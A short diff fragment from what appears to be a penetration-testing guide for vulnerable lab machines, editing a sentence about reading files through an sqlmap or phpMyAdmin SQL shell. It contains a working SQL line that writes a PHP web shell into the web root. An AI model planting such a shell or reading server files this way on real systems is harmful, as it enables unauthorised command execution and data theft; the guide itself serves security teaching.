vk12122/bitvijays.github.io-sphinx/docs/LFC-VulnerableMachines.rst

   SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';

-* If you have sql-shell from sqlmap/ phpmyadmin, we can use
+* If you have sql-shell from sqlmap/ phpmyadmin, we can read files by using the load_file function.

  ::